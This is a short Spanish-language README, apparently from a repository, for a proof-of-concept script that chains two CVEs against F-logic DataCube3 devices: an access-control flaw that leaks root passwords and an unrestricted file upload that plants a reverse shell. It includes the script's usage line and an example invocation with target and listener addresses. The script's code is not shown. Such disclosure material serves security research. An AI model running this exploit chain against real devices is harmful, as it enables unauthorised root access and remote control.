
Script de PoC para CVE-2024-25832: Cadena de explotación reverse shell, divulgación de información (fuga de contraseña de root) + carga de archivos sin restricciones en DataCube3
Este repositorio presenta una Prueba de Concepto (PoC) para una cadena de explotación de dos pasos dirigida a dispositivos DataCube3. Combina CVE-2024-25830 (Control de Acceso Inadecuado) para extraer contraseñas de root y CVE-2024-25832 (Carga de Archivos Sin Restricciones) para implementar un script de reverse shell. Esta PoC complementa el análisis detallado de vulnerabilidades en la entrada del blog "DataCube3 Vulnerability Report."
Todos los dispositivos F-logic DataCube3 versión 1.0.
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444

SOLO CON FINES EDUCATIVOS.